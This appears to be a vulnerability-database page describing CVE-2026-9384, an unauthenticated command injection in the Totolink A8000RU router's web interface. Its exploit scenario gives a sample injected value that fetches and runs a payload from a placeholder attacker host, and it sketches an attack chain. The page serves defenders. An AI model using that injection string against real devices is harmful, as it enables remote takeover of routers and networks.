Skip to main content

Totolink A8000RU CVE-2026-9384

| EUVD-2026-31594 HIGH
OS Command Injection (CWE-78)
2026-05-24 VulDB GHSA-354q-fgjq-f9fc
Command Injection A8000Ru
8.9
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 09:25 vuln.today
Severity Changed
May 26, 2026 - 19:07 NVD
CRITICAL HIGH
CVSS changed
May 26, 2026 - 19:07 NVD
9.8 (CRITICAL) 8.9 (HIGH)

DescriptionCVE.org

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument ip results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used.

AnalysisAI

OS command injection in the Totolink A8000RU router (firmware 7.1cu.643_b20200521) allows remote unauthenticated attackers to execute arbitrary operating system commands via the ip parameter handled by the setDiagnosisCfg function in /cgi-bin/cstecgi.cgi. Publicly available exploit code exists, and the CVSS 4.0 score of 8.9 reflects high impact across confidentiality, integrity, and availability. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed A8000RU admin interface
Delivery
Send crafted POST to /cgi-bin/cstecgi.cgi
Exploit
Inject shell metacharacters into ip parameter of setDiagnosisCfg
Execution
Trigger OS command execution as root
Persist
Download and run implant on router
Impact
Establish persistence and pivot into LAN
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) indicates no special conditions are required - remote unauthenticated exploitation against default configurations of the Totolink A8000RU is possible. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals are largely aligned toward elevated risk: the CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms remote, unauthenticated, low-complexity exploitation, and SSVC reports Exploitation=PoC, Automatable=yes, Technical Impact=total - meaning a working exploit is public and the bug is amenable to mass scanning/scripted attack. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker reachable to the router's web management interface - either on the LAN, via a compromised internal host, or against a device with WAN admin exposed - sends a crafted POST request to /cgi-bin/cstecgi.cgi invoking setDiagnosisCfg with shell metacharacters in the ip parameter (e.g., '8.8.8.8; wget http://attacker/x -O /tmp/x; sh /tmp/x'). Because no authentication is required and a public PoC exists on GitHub, the attacker gains arbitrary command execution as the web server user (typically root on this embedded device), enabling persistent implants, traffic interception, or pivoting into the internal network.
Remediation No vendor-released patch identified at time of analysis - the references include only the vendor homepage (https://www.totolink.net/) and VulDB/EUVD/NVD entries, with no firmware update advisory. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Scan your network for all Totolik A8000RU devices and identify those running firmware 7.1cu.643_b20200521 or earlier; restrict external management access via firewall rules. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9384 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy